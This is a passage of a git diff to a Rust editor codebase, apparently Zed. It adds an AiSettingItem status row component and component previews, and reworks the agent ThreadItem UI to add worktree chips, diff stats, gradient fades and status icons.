toolchain.clone(), + ) + .await + .ok()?; project .update(cx, |this, cx| { this.activate_toolchain( diff --git a/crates/toolchain_selector/src/toolchain_selector.rs b/crates/toolchain_selector/src/toolchain_selector.rs index f7b451e876cb945633a951b4c00920d2ce59f455..010003cd572f85b1aa8e6d31b0fc0a511f2ebd7f 100644 --- a/crates/toolchain_selector/src/toolchain_selector.rs +++ b/crates/toolchain_selector/src/toolchain_selector.rs @@ -584,11 +584,11 @@ impl ToolchainSelector { window: &mut Window, cx: &mut Context, ) -> Option<()> { - let (_, buffer, _) = workspace + let buffer = workspace .active_item(cx)? .act_as::(cx)? .read(cx) - .active_excerpt(cx)?; + .active_buffer(cx)?; let project = workspace.project().clone(); let language_name = buffer.read(cx).language()?.name(); @@ -920,16 +920,16 @@ impl PickerDelegate for ToolchainSelectorDelegate { let worktree_abs_path_root = self.worktree_abs_path_root.clone(); let path = self.relative_path.clone(); let relative_path = self.relative_path.clone(); + let db = workspace::WorkspaceDb::global(cx); cx.spawn_in(window, async move |_, cx| { - workspace::WORKSPACE_DB - .set_toolchain( - workspace_id, - worktree_abs_path_root, - relative_path, - toolchain.clone(), - ) - .await - .log_err(); + db.set_toolchain( + workspace_id, + worktree_abs_path_root, + relative_path, + toolchain.clone(), + ) + .await + .log_err(); workspace .update(cx, |this, cx| { this.project().update(cx, |this, cx| { diff --git a/crates/ui/Cargo.toml b/crates/ui/Cargo.toml index 5eb58bf1da1f25cc273a9fc5d7c08b920d3471e9..05433bf8eebf78eccbbedff7a4bfcfb39b0022a7 100644 --- a/crates/ui/Cargo.toml +++ b/crates/ui/Cargo.toml @@ -23,13 +23,12 @@ itertools.workspace = true menu.workspace = true schemars.workspace = true serde.workspace = true -settings.workspace = true smallvec.workspace = true story = { workspace = true, optional = true } strum.workspace = true theme.workspace = true ui_macros.workspace = true -util.workspace = true +gpui_util.workspace = true 
[target.'cfg(windows)'.dependencies] windows.workspace = true diff --git a/crates/ui/src/components.rs b/crates/ui/src/components.rs index cce736e237e2c2500b56f13ae579dee4426b5bfb..367d80d79c9af8722091e36c8e04bafb7ef0d8b5 100644 --- a/crates/ui/src/components.rs +++ b/crates/ui/src/components.rs @@ -6,12 +6,14 @@ mod callout; mod chip; mod collab; mod context_menu; +mod count_badge; mod data_table; mod diff_stat; mod disclosure; mod divider; mod dropdown_menu; mod facepile; +mod gradient_fade; mod group; mod icon; mod image; @@ -27,6 +29,7 @@ mod notification; mod popover; mod popover_menu; mod progress; +mod redistributable_columns; mod right_click_menu; mod scrollbar; mod stack; @@ -48,12 +51,14 @@ pub use callout::*; pub use chip::*; pub use collab::*; pub use context_menu::*; +pub use count_badge::*; pub use data_table::*; pub use diff_stat::*; pub use disclosure::*; pub use divider::*; pub use dropdown_menu::*; pub use facepile::*; +pub use gradient_fade::*; pub use group::*; pub use icon::*; pub use image::*; @@ -69,6 +74,7 @@ pub use notification::*; pub use popover::*; pub use popover_menu::*; pub use progress::*; +pub use redistributable_columns::*; pub use right_click_menu::*; pub use scrollbar::*; pub use stack::*; diff --git a/crates/ui/src/components/ai.rs b/crates/ui/src/components/ai.rs index a31db264e985b3adbca26b9e8d3fb2bdca306dcb..e3ad1db794902ae28b28274a60e3593efb3be392 100644 --- a/crates/ui/src/components/ai.rs +++ b/crates/ui/src/components/ai.rs @@ -1,5 +1,7 @@ +mod ai_setting_item; mod configured_api_card; mod thread_item; +pub use ai_setting_item::*; pub use configured_api_card::*; pub use thread_item::*; diff --git a/crates/ui/src/components/ai/ai_setting_item.rs b/crates/ui/src/components/ai/ai_setting_item.rs new file mode 100644 index 0000000000000000000000000000000000000000..bfb55e4c7da688b736b4ff5c64a5767f1e930120 --- /dev/null +++ b/crates/ui/src/components/ai/ai_setting_item.rs @@ -0,0 +1,406 @@ +use crate::{IconDecoration, 
IconDecorationKind, Tooltip, prelude::*}; +use gpui::{Animation, AnimationExt, SharedString, pulsating_between}; +use std::time::Duration; + +#[derive(Clone, Copy, Debug, Default, PartialEq, Eq)] +pub enum AiSettingItemStatus { + #[default] + Stopped, + Starting, + Running, + Error, + AuthRequired, + Authenticating, +} + +impl AiSettingItemStatus { + fn tooltip_text(&self) -> &'static str { + match self { + Self::Stopped => "Server is stopped.", + Self::Starting => "Server is starting.", + Self::Running => "Server is active.", + Self::Error => "Server has an error.", + Self::AuthRequired => "Authentication required.", + Self::Authenticating => "Waiting for authorization…", + } + } + + fn indicator_color(&self) -> Option { + match self { + Self::Stopped => None, + Self::Starting | Self::Authenticating => Some(Color::Muted), + Self::Running => Some(Color::Success), + Self::Error => Some(Color::Error), + Self::AuthRequired => Some(Color::Warning), + } + } + + fn is_animated(&self) -> bool { + matches!(self, Self::Starting | Self::Authenticating) + } +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +pub enum AiSettingItemSource { + Extension, + Custom, + Registry, +} + +impl AiSettingItemSource { + fn icon_name(&self) -> IconName { + match self { + Self::Extension => IconName::ZedSrcExtension, + Self::Custom => IconName::ZedSrcCustom, + Self::Registry => IconName::AcpRegistry, + } + } + + fn tooltip_text(&self, label: &str) -> String { + match self { + Self::Extension => format!("{label} was installed from an extension."), + Self::Registry => format!("{label} was installed from the ACP registry."), + Self::Custom => format!("{label} was configured manually."), + } + } +} + +/// A reusable setting item row for AI-related configuration lists. 
+#[derive(IntoElement, RegisterComponent)] +pub struct AiSettingItem { + id: ElementId, + status: AiSettingItemStatus, + source: AiSettingItemSource, + icon: Option, + label: SharedString, + detail_label: Option, + actions: Vec, + details: Option, +} + +impl AiSettingItem { + pub fn new( + id: impl Into, + label: impl Into, + status: AiSettingItemStatus, + source: AiSettingItemSource, + ) -> Self { + Self { + id: id.into(), + status, + source, + icon: None, + label: label.into(), + detail_label: None, + actions: Vec::new(), + details: None, + } + } + + pub fn icon(mut self, element: impl IntoElement) -> Self { + self.icon = Some(element.into_any_element()); + self + } + + pub fn detail_label(mut self, detail: impl Into) -> Self { + self.detail_label = Some(detail.into()); + self + } + + pub fn action(mut self, element: impl IntoElement) -> Self { + self.actions.push(element.into_any_element()); + self + } + + pub fn details(mut self, element: impl IntoElement) -> Self { + self.details = Some(element.into_any_element()); + self + } +} + +impl RenderOnce for AiSettingItem { + fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { + let Self { + id, + status, + source, + icon, + label, + detail_label, + actions, + details, + } = self; + + let source_id = format!("source-{}", id); + let icon_id = format!("icon-{}", id); + let status_tooltip = status.tooltip_text(); + let source_tooltip = source.tooltip_text(&label); + + let icon_element = icon.unwrap_or_else(|| { + let letter = label.chars().next().unwrap_or('?').to_ascii_uppercase(); + + h_flex() + .size_5() + .flex_none() + .justify_center() + .rounded_sm() + .border_1() + .border_color(cx.theme().colors().border_variant) + .bg(cx.theme().colors().element_active.opacity(0.2)) + .child( + Label::new(SharedString::from(letter.to_string())) + .size(LabelSize::Small) + .color(Color::Muted) + .buffer_font(cx), + ) + .into_any_element() + }); + + let icon_child = if status.is_animated() { + div() + 
.child(icon_element) + .with_animation( + format!("icon-pulse-{}", id), + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.4, 0.8)), + |element, delta| element.opacity(delta), + ) + .into_any_element() + } else { + icon_element.into_any_element() + }; + + let icon_container = div() + .id(icon_id) + .relative() + .flex_none() + .tooltip(Tooltip::text(status_tooltip)) + .child(icon_child) + .when_some(status.indicator_color(), |this, color| { + this.child( + IconDecoration::new( + IconDecorationKind::Dot, + cx.theme().colors().panel_background, + cx, + ) + .size(px(12.)) + .color(color.color(cx)) + .position(gpui::Point { + x: px(-3.), + y: px(-3.), + }), + ) + }); + + v_flex() + .id(id) + .min_w_0() + .child( + h_flex() + .min_w_0() + .w_full() + .gap_1p5() + .justify_between() + .child( + h_flex() + .flex_1() + .min_w_0() + .gap_1p5() + .child(icon_container) + .child(Label::new(label).flex_shrink_0().truncate()) + .child( + div() + .id(source_id) + .min_w_0() + .flex_none() + .tooltip(Tooltip::text(source_tooltip)) + .child( + Icon::new(source.icon_name()) + .size(IconSize::Small) + .color(Color::Muted), + ), + ) + .when_some(detail_label, |this, detail| { + this.child( + Label::new(detail) + .color(Color::Muted) + .size(LabelSize::Small), + ) + }), + ) + .when(!actions.is_empty(), |this| { + this.child(h_flex().gap_0p5().flex_none().children(actions)) + }), + ) + .children(details) + } +} + +impl Component for AiSettingItem { + fn scope() -> ComponentScope { + ComponentScope::Agent + } + + fn preview(_window: &mut Window, cx: &mut App) -> Option { + let container = || { + v_flex() + .w_80() + .p_2() + .gap_2() + .border_1() + .border_color(cx.theme().colors().border_variant) + .bg(cx.theme().colors().panel_background) + }; + + let details_row = |icon_name: IconName, icon_color: Color, message: &str| { + h_flex() + .py_1() + .min_w_0() + .w_full() + .gap_2() + .justify_between() + .child( + h_flex() + .pr_4() + .min_w_0() + 
.w_full() + .gap_2() + .child( + Icon::new(icon_name) + .size(IconSize::XSmall) + .color(icon_color), + ) + .child( + div().min_w_0().flex_1().child( + Label::new(SharedString::from(message.to_string())) + .color(Color::Muted) + .size(LabelSize::Small), + ), + ), + ) + }; + + let examples = vec![ + single_example( + "MCP server with letter avatar (running)", + container() + .child( + AiSettingItem::new( + "ext-mcp", + "Postgres", + AiSettingItemStatus::Running, + AiSettingItemSource::Extension, + ) + .detail_label("3 tools") + .action( + IconButton::new("menu", IconName::Settings) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ) + .action( + IconButton::new("toggle", IconName::Check) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ), + ) + .into_any_element(), + ), + single_example( + "MCP server (stopped)", + container() + .child(AiSettingItem::new( + "custom-mcp", + "my-local-server", + AiSettingItemStatus::Stopped, + AiSettingItemSource::Custom, + )) + .into_any_element(), + ), + single_example( + "MCP server (starting, animated)", + container() + .child(AiSettingItem::new( + "starting-mcp", + "Context7", + AiSettingItemStatus::Starting, + AiSettingItemSource::Extension, + )) + .into_any_element(), + ), + single_example( + "Agent with icon (running)", + container() + .child( + AiSettingItem::new( + "ext-agent", + "Claude Agent", + AiSettingItemStatus::Running, + AiSettingItemSource::Extension, + ) + .icon( + Icon::new(IconName::AiClaude) + .size(IconSize::Small) + .color(Color::Muted), + ) + .action( + IconButton::new("restart", IconName::RotateCw) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ) + .action( + IconButton::new("delete", IconName::Trash) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ), + ) + .into_any_element(), + ), + single_example( + "Registry agent (starting, animated)", + container() + .child( + AiSettingItem::new( + "reg-agent", + "Devin Agent", + AiSettingItemStatus::Starting, + 
AiSettingItemSource::Registry, + ) + .icon( + Icon::new(IconName::ZedAssistant) + .size(IconSize::Small) + .color(Color::Muted), + ), + ) + .into_any_element(), + ), + single_example( + "Error with details", + container() + .child( + AiSettingItem::new( + "error-mcp", + "Amplitude", + AiSettingItemStatus::Error, + AiSettingItemSource::Extension, + ) + .details( + details_row( + IconName::XCircle, + Color::Error, + "Failed to connect: connection refused", + ) + .child( + Button::new("logout", "Log Out") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small), + ), + ), + ) + .into_any_element(), + ), + ]; + + Some(example_group(examples).vertical().into_any_element()) + } +} diff --git a/crates/ui/src/components/ai/configured_api_card.rs b/crates/ui/src/components/ai/configured_api_card.rs index 37f9ac7602d676906565a911f1bbca6d2b40f755..c9fd129a678d008d2ff0d6833e1497f61c73d989 100644 --- a/crates/ui/src/components/ai/configured_api_card.rs +++ b/crates/ui/src/components/ai/configured_api_card.rs @@ -1,7 +1,7 @@ use crate::{Tooltip, prelude::*}; use gpui::{ClickEvent, IntoElement, ParentElement, SharedString}; -#[derive(IntoElement)] +#[derive(IntoElement, RegisterComponent)] pub struct ConfiguredApiCard { label: SharedString, button_label: Option, @@ -52,6 +52,59 @@ impl ConfiguredApiCard { } } +impl Component for ConfiguredApiCard { + fn scope() -> ComponentScope { + ComponentScope::Agent + } + + fn preview(_window: &mut Window, cx: &mut App) -> Option { + let container = || { + v_flex() + .w_72() + .p_2() + .gap_2() + .border_1() + .border_color(cx.theme().colors().border_variant) + .bg(cx.theme().colors().panel_background) + }; + + let examples = vec![ + single_example( + "Default", + container() + .child(ConfiguredApiCard::new("API key is configured")) + .into_any_element(), + ), + single_example( + "Custom Button Label", + container() + .child( + ConfiguredApiCard::new("OpenAI API key configured") + .button_label("Remove Key"), + ) + 
.into_any_element(), + ), + single_example( + "With Tooltip", + container() + .child( + ConfiguredApiCard::new("Anthropic API key configured") + .tooltip_label("Click to reset your API key"), + ) + .into_any_element(), + ), + single_example( + "Disabled", + container() + .child(ConfiguredApiCard::new("API key is configured").disabled(true)) + .into_any_element(), + ), + ]; + + Some(example_group(examples).into_any_element()) + } +} + impl RenderOnce for ConfiguredApiCard { fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement { let button_label = self.button_label.unwrap_or("Reset Key".into()); @@ -80,10 +133,11 @@ impl RenderOnce for ConfiguredApiCard { elem.tab_index(tab_index) }) .label_size(LabelSize::Small) - .icon(IconName::Undo) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::Undo) + .size(IconSize::Small) + .color(Color::Muted), + ) .disabled(self.disabled) .when_some(self.tooltip_label, |this, label| { this.tooltip(Tooltip::text(label)) diff --git a/crates/ui/src/components/ai/copilot_configuration_callout.rs b/crates/ui/src/components/ai/copilot_configuration_callout.rs deleted file mode 100644 index 8b137891791fe96927ad78e64b0aad7bded08bdc..0000000000000000000000000000000000000000 --- a/crates/ui/src/components/ai/copilot_configuration_callout.rs +++ /dev/null @@ -1 +0,0 @@ - diff --git a/crates/ui/src/components/ai/thread_item.rs b/crates/ui/src/components/ai/thread_item.rs index 6cc710690ea0103bf2de4253bc405eb52be5af69..7658946b6395d6314d90db52716020a922c85ccc 100644 --- a/crates/ui/src/components/ai/thread_item.rs +++ b/crates/ui/src/components/ai/thread_item.rs @@ -1,9 +1,11 @@ -use crate::{ - DecoratedIcon, DiffStat, HighlightedLabel, IconDecoration, IconDecorationKind, SpinnerLabel, - prelude::*, -}; +use crate::{CommonAnimationExt, DiffStat, GradientFade, HighlightedLabel, Tooltip, prelude::*}; -use gpui::{AnyView, ClickEvent, SharedString}; +use 
gpui::{ + Animation, AnimationExt, AnyView, ClickEvent, Hsla, MouseButton, SharedString, + pulsating_between, +}; +use itertools::Itertools as _; +use std::{path::PathBuf, sync::Arc, time::Duration}; #[derive(Clone, Copy, Debug, Default, PartialEq, Eq)] pub enum AgentThreadStatus { @@ -14,26 +16,41 @@ pub enum AgentThreadStatus { Error, } +#[derive(Clone)] +pub struct ThreadItemWorktreeInfo { + pub name: SharedString, + pub full_path: SharedString, + pub highlight_positions: Vec, +} + #[derive(IntoElement, RegisterComponent)] pub struct ThreadItem { id: ElementId, icon: IconName, + icon_color: Option, + icon_visible: bool, + custom_icon_from_external_svg: Option, title: SharedString, + title_label_color: Option, + title_generating: bool, + highlight_positions: Vec, timestamp: SharedString, - running: bool, - generation_done: bool, + notified: bool, status: AgentThreadStatus, selected: bool, + focused: bool, hovered: bool, + rounded: bool, added: Option, removed: Option, - worktree: Option, - highlight_positions: Vec, - worktree_highlight_positions: Vec, + project_paths: Option>, + project_name: Option, + worktrees: Vec, on_click: Option>, on_hover: Box, action_slot: Option, tooltip: Option AnyView + 'static>>, + base_bg: Option, } impl ThreadItem { @@ -41,22 +58,31 @@ impl ThreadItem { Self { id: id.into(), icon: IconName::ZedAgent, + icon_color: None, + icon_visible: true, + custom_icon_from_external_svg: None, title: title.into(), + title_label_color: None, + title_generating: false, + highlight_positions: Vec::new(), timestamp: "".into(), - running: false, - generation_done: false, + notified: false, status: AgentThreadStatus::default(), selected: false, + focused: false, hovered: false, + rounded: false, added: None, removed: None, - worktree: None, - highlight_positions: Vec::new(), - worktree_highlight_positions: Vec::new(), + + project_paths: None, + project_name: None, + worktrees: Vec::new(), on_click: None, on_hover: Box::new(|_, _, _| {}), action_slot: 
None, tooltip: None, + base_bg: None, } } @@ -70,13 +96,23 @@ impl ThreadItem { self } - pub fn running(mut self, running: bool) -> Self { - self.running = running; + pub fn icon_color(mut self, color: Color) -> Self { + self.icon_color = Some(color); + self + } + + pub fn icon_visible(mut self, visible: bool) -> Self { + self.icon_visible = visible; + self + } + + pub fn custom_icon_from_external_svg(mut self, svg: impl Into) -> Self { + self.custom_icon_from_external_svg = Some(svg.into()); self } - pub fn generation_done(mut self, generation_done: bool) -> Self { - self.generation_done = generation_done; + pub fn notified(mut self, notified: bool) -> Self { + self.notified = notified; self } @@ -85,11 +121,31 @@ impl ThreadItem { self } + pub fn title_generating(mut self, generating: bool) -> Self { + self.title_generating = generating; + self + } + + pub fn title_label_color(mut self, color: Color) -> Self { + self.title_label_color = Some(color); + self + } + + pub fn highlight_positions(mut self, positions: Vec) -> Self { + self.highlight_positions = positions; + self + } + pub fn selected(mut self, selected: bool) -> Self { self.selected = selected; self } + pub fn focused(mut self, focused: bool) -> Self { + self.focused = focused; + self + } + pub fn added(mut self, added: usize) -> Self { self.added = Some(added); self @@ -100,18 +156,18 @@ impl ThreadItem { self } - pub fn worktree(mut self, worktree: impl Into) -> Self { - self.worktree = Some(worktree.into()); + pub fn project_paths(mut self, paths: Arc<[PathBuf]>) -> Self { + self.project_paths = Some(paths); self } - pub fn highlight_positions(mut self, positions: Vec) -> Self { - self.highlight_positions = positions; + pub fn project_name(mut self, name: impl Into) -> Self { + self.project_name = Some(name.into()); self } - pub fn worktree_highlight_positions(mut self, positions: Vec) -> Self { - self.worktree_highlight_positions = positions; + pub fn worktrees(mut self, worktrees: Vec) -> Self { + 
self.worktrees = worktrees; self } @@ -120,6 +176,11 @@ impl ThreadItem { self } + pub fn rounded(mut self, rounded: bool) -> Self { + self.rounded = rounded; + self + } + pub fn on_click( mut self, handler: impl Fn(&ClickEvent, &mut Window, &mut App) + 'static, @@ -142,98 +203,181 @@ impl ThreadItem { self.tooltip = Some(Box::new(tooltip)); self } + + pub fn base_bg(mut self, color: Hsla) -> Self { + self.base_bg = Some(color); + self + } } impl RenderOnce for ThreadItem { fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement { - let clr = cx.theme().colors(); - // let dot_separator = || { - // Label::new("•") - // .size(LabelSize::Small) - // .color(Color::Muted) - // .alpha(0.5) - // }; - - let icon_container = || h_flex().size_4().justify_center(); - let agent_icon = Icon::new(self.icon) - .color(Color::Muted) - .size(IconSize::Small); - - let decoration = if self.status == AgentThreadStatus::WaitingForConfirmation { - Some( - IconDecoration::new( - IconDecorationKind::Triangle, - cx.theme().colors().surface_background, - cx, - ) - .color(cx.theme().status().warning) - .position(gpui::Point { - x: px(-2.), - y: px(-2.), - }), + let color = cx.theme().colors(); + let sidebar_base_bg = color + .title_bar_background + .blend(color.panel_background.opacity(0.25)); + + let raw_bg = self.base_bg.unwrap_or(sidebar_base_bg); + let apparent_bg = color.background.blend(raw_bg); + + let base_bg = if self.selected { + apparent_bg.blend(color.element_active) + } else { + apparent_bg + }; + + let hover_color = color + .element_active + .blend(color.element_background.opacity(0.2)); + let hover_bg = apparent_bg.blend(hover_color); + + let gradient_overlay = GradientFade::new(base_bg, hover_bg, hover_bg) + .width(px(64.0)) + .right(px(-10.0)) + .gradient_stop(0.75) + .group_name("thread-item"); + + let dot_separator = || { + Label::new("•") + .size(LabelSize::Small) + .color(Color::Muted) + .alpha(0.5) + }; + + let icon_id = format!("icon-{}", self.id); + let 
icon_visible = self.icon_visible; + let icon_container = || { + h_flex() + .id(icon_id.clone()) + .size_4() + .flex_none() + .justify_center() + .when(!icon_visible, |this| this.invisible()) + }; + let icon_color = self.icon_color.unwrap_or(Color::Muted); + let agent_icon = if let Some(custom_svg) = self.custom_icon_from_external_svg { + Icon::from_external_svg(custom_svg) + .color(icon_color) + .size(IconSize::Small) + } else { + Icon::new(self.icon).color(icon_color).size(IconSize::Small) + }; + + let (status_icon, icon_tooltip) = if self.status == AgentThreadStatus::Error { + ( + Some( + Icon::new(IconName::Close) + .size(IconSize::Small) + .color(Color::Error), + ), + Some("Thread has an Error"), ) - } else if self.status == AgentThreadStatus::Error { - Some( - IconDecoration::new( - IconDecorationKind::X, - cx.theme().colors().surface_background, - cx, - ) - .color(cx.theme().status().error) - .position(gpui::Point { - x: px(-2.), - y: px(-2.), - }), + } else if self.status == AgentThreadStatus::WaitingForConfirmation { + ( + Some( + Icon::new(IconName::Warning) + .size(IconSize::XSmall) + .color(Color::Warning), + ), + Some("Thread is Waiting for Confirmation"), ) - } else if self.generation_done { - Some( - IconDecoration::new( - IconDecorationKind::Dot, - cx.theme().colors().surface_background, - cx, - ) - .color(cx.theme().colors().text_accent) - .position(gpui::Point { - x: px(-2.), - y: px(-2.), - }), + } else if self.notified { + ( + Some( + Icon::new(IconName::Circle) + .size(IconSize::Small) + .color(Color::Accent), + ), + Some("Thread's Generation is Complete"), ) } else { - None + (None, None) }; - let icon = if let Some(decoration) = decoration { - icon_container().child(DecoratedIcon::new(agent_icon, Some(decoration))) + let icon = if self.status == AgentThreadStatus::Running { + icon_container() + .child( + Icon::new(IconName::LoadCircle) + .size(IconSize::Small) + .color(Color::Muted) + .with_rotate_animation(2), + ) + .into_any_element() + } 
else if let Some(status_icon) = status_icon { + icon_container() + .child(status_icon) + .when_some(icon_tooltip, |icon, tooltip| { + icon.tooltip(Tooltip::text(tooltip)) + }) + .into_any_element() } else { - icon_container().child(agent_icon) + icon_container().child(agent_icon).into_any_element() }; - let running_or_action = self.running || (self.hovered && self.action_slot.is_some()); - - // let has_no_changes = self.added.is_none() && self.removed.is_none(); - let title = self.title; let highlight_positions = self.highlight_positions; - let title_label = if highlight_positions.is_empty() { - Label::new(title).truncate().into_any_element() + + let title_label = if self.title_generating { + Label::new(title) + .color(Color::Muted) + .with_animation( + "generating-title", + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.4, 0.8)), + |label, delta| label.alpha(delta), + ) + .into_any_element() + } else if highlight_positions.is_empty() { + Label::new(title) + .when_some(self.title_label_color, |label, color| label.color(color)) + .into_any_element() } else { HighlightedLabel::new(title, highlight_positions) - .truncate() + .when_some(self.title_label_color, |label, color| label.color(color)) .into_any_element() }; + let has_diff_stats = self.added.is_some() || self.removed.is_some(); + let diff_stat_id = self.id.clone(); + let added_count = self.added.unwrap_or(0); + let removed_count = self.removed.unwrap_or(0); + + let project_paths = self.project_paths.as_ref().and_then(|paths| { + let paths_str = paths + .as_ref() + .iter() + .filter_map(|p| p.file_name()) + .filter_map(|name| name.to_str()) + .join(", "); + if paths_str.is_empty() { + None + } else { + Some(paths_str) + } + }); + + let has_project_name = self.project_name.is_some(); + let has_project_paths = project_paths.is_some(); + let has_worktree = !self.worktrees.is_empty(); + let has_timestamp = !self.timestamp.is_empty(); + let timestamp = self.timestamp; + 
v_flex() .id(self.id.clone()) .cursor_pointer() - .map(|this| { - if self.worktree.is_some() { - this.p_2() - } else { - this.px_2().py_1() - } - }) - .when(self.selected, |s| s.bg(clr.element_active)) - .hover(|s| s.bg(clr.element_hover)) + .group("thread-item") + .relative() + .overflow_hidden() + .w_full() + .py_1() + .px_1p5() + .when(self.selected, |s| s.bg(color.element_active)) + .border_1() + .border_color(gpui::transparent_black()) + .when(self.focused, |s| s.border_color(color.border_focused)) + .when(self.rounded, |s| s.rounded_sm()) + .hover(|s| s.bg(hover_color)) .on_hover(self.on_hover) .child( h_flex() @@ -251,72 +395,149 @@ impl RenderOnce for ThreadItem { .child(title_label) .when_some(self.tooltip, |this, tooltip| this.tooltip(tooltip)), ) - .when(running_or_action, |this| { - this.child( + .child(gradient_overlay) + .when(self.hovered, |this| { + this.when_some(self.action_slot, |this, slot| { + let overlay = GradientFade::new(base_bg, hover_bg, hover_bg) + .width(px(64.0)) + .right(px(6.)) + .gradient_stop(0.75) + .group_name("thread-item"); + + this.child( + h_flex() + .relative() + .on_mouse_down(MouseButton::Left, |_, _, cx| { + cx.stop_propagation() + }) + .child(overlay) + .child(slot), + ) + }) + }), + ) + .when( + has_project_name + || has_project_paths + || has_worktree + || has_diff_stats + || has_timestamp, + |this| { + // Collect all full paths for the shared tooltip. + let worktree_tooltip: SharedString = self + .worktrees + .iter() + .map(|wt| wt.full_path.as_ref()) + .collect::>() + .join("\n") + .into(); + + let worktree_tooltip_title = if self.worktrees.len() > 1 { + "Thread Running in Local Git Worktrees" + } else { + "Thread Running in a Local Git Worktree" + }; + + // Deduplicate chips by name — e.g. two paths both named + // "olivetti" produce a single chip. Highlight positions + // come from the first occurrence. 
+ let mut seen_names: Vec = Vec::new(); + let mut worktree_labels: Vec = Vec::new(); + + for wt in self.worktrees { + if seen_names.contains(&wt.name) { + continue; + } + + let chip_index = seen_names.len(); + seen_names.push(wt.name.clone()); + + let label = if wt.highlight_positions.is_empty() { + Label::new(wt.name) + .size(LabelSize::Small) + .color(Color::Muted) + .into_any_element() + } else { + HighlightedLabel::new(wt.name, wt.highlight_positions) + .size(LabelSize::Small) + .color(Color::Muted) + .into_any_element() + }; + let tooltip_title = worktree_tooltip_title; + let tooltip_meta = worktree_tooltip.clone(); + + worktree_labels.push( h_flex() - .gap_1() - .when(self.running, |this| { - this.child( - icon_container() - .child(SpinnerLabel::new().color(Color::Accent)), + .id(format!("{}-worktree-{chip_index}", self.id.clone())) + .gap_0p5() + .child( + Icon::new(IconName::GitWorktree) + .size(IconSize::XSmall) + .color(Color::Muted), + ) + .child(label) + .tooltip(move |_, cx| { + Tooltip::with_meta( + tooltip_title, + None, + tooltip_meta.clone(), + cx, ) }) - .when(self.hovered, |this| { - this.when_some(self.action_slot, |this, slot| this.child(slot)) - }), - ) - }), + .into_any_element(), + ); + } + + this.child( + h_flex() + .min_w_0() + .gap_1p5() + .child(icon_container()) // Icon Spacing + .when_some(self.project_name, |this, name| { + this.child( + Label::new(name).size(LabelSize::Small).color(Color::Muted), + ) + }) + .when( + has_project_name && (has_project_paths || has_worktree), + |this| this.child(dot_separator()), + ) + .when_some(project_paths, |this, paths| { + this.child( + Label::new(paths) + .size(LabelSize::Small) + .color(Color::Muted) + .into_any_element(), + ) + }) + .when(has_project_paths && has_worktree, |this| { + this.child(dot_separator()) + }) + .children(worktree_labels) + .when( + (has_project_name || has_project_paths || has_worktree) + && (has_diff_stats || has_timestamp), + |this| this.child(dot_separator()), + ) + 
.when(has_diff_stats, |this| { + this.child( + DiffStat::new(diff_stat_id, added_count, removed_count) + .tooltip("Unreviewed Changes"), + ) + }) + .when(has_diff_stats && has_timestamp, |this| { + this.child(dot_separator()) + }) + .when(has_timestamp, |this| { + this.child( + Label::new(timestamp.clone()) + .size(LabelSize::Small) + .color(Color::Muted), + ) + }), + ) + }, ) - .when_some(self.worktree, |this, worktree| { - let worktree_highlight_positions = self.worktree_highlight_positions; - let worktree_label = if worktree_highlight_positions.is_empty() { - Label::new(worktree) - .size(LabelSize::Small) - .color(Color::Muted) - .truncate_start() - .into_any_element() - } else { - HighlightedLabel::new(worktree, worktree_highlight_positions) - .size(LabelSize::Small) - .color(Color::Muted) - .into_any_element() - }; - - this.child( - h_flex() - .min_w_0() - .gap_1p5() - .child(icon_container()) // Icon Spacing - .child(worktree_label) - // TODO: Uncomment the elements below when we're ready to expose this data - // .child(dot_separator()) - // .child( - // Label::new(self.timestamp) - // .size(LabelSize::Small) - // .color(Color::Muted), - // ) - // .child( - // Label::new("•") - // .size(LabelSize::Small) - // .color(Color::Muted) - // .alpha(0.5), - // ) - // .when(has_no_changes, |this| { - // this.child( - // Label::new("No Changes") - // .size(LabelSize::Small) - // .color(Color::Muted), - // ) - // }) - .when(self.added.is_some() || self.removed.is_some(), |this| { - this.child(DiffStat::new( - self.id, - self.added.unwrap_or(0), - self.removed.unwrap_or(0), - )) - }), - ) - }) .when_some(self.on_click, |this, on_click| this.on_click(on_click)) } } @@ -327,32 +548,37 @@ impl Component for ThreadItem { } fn preview(_window: &mut Window, cx: &mut App) -> Option { + let color = cx.theme().colors(); + let bg = color + .title_bar_background + .blend(color.panel_background.opacity(0.25)); + let container = || { v_flex() .w_72() .border_1() - 
.border_color(cx.theme().colors().border_variant) - .bg(cx.theme().colors().panel_background) + .border_color(color.border_variant) + .bg(bg) }; let thread_item_examples = vec![ single_example( - "Default", + "Default (minutes)", container() .child( ThreadItem::new("ti-1", "Linking to the Agent Panel Depending on Settings") .icon(IconName::AiOpenAi) - .timestamp("1:33 AM"), + .timestamp("15m"), ) .into_any_element(), ), single_example( - "Generation Done", + "Notified (weeks)", container() .child( ThreadItem::new("ti-2", "Refine thread view scrolling behavior") - .timestamp("12:12 AM") - .generation_done(true), + .timestamp("1w") + .notified(true), ) .into_any_element(), ), @@ -361,7 +587,7 @@ impl Component for ThreadItem { container() .child( ThreadItem::new("ti-2b", "Execute shell command in terminal") - .timestamp("12:15 AM") + .timestamp("2h") .status(AgentThreadStatus::WaitingForConfirmation), ) .into_any_element(), @@ -371,7 +597,7 @@ impl Component for ThreadItem { container() .child( ThreadItem::new("ti-2c", "Failed to connect to language server") - .timestamp("12:20 AM") + .timestamp("5h") .status(AgentThreadStatus::Error), ) .into_any_element(), @@ -382,8 +608,8 @@ impl Component for ThreadItem { .child( ThreadItem::new("ti-3", "Add line numbers option to FileEditBlock") .icon(IconName::AiClaude) - .timestamp("7:30 PM") - .running(true), + .timestamp("23h") + .status(AgentThreadStatus::Running), ) .into_any_element(), ), @@ -393,34 +619,120 @@ impl Component for ThreadItem { .child( ThreadItem::new("ti-4", "Add line numbers option to FileEditBlock") .icon(IconName::AiClaude) - .timestamp("7:37 PM") - .worktree("link-agent-panel"), + .timestamp("2w") + .worktrees(vec![ThreadItemWorktreeInfo { + name: "link-agent-panel".into(), + 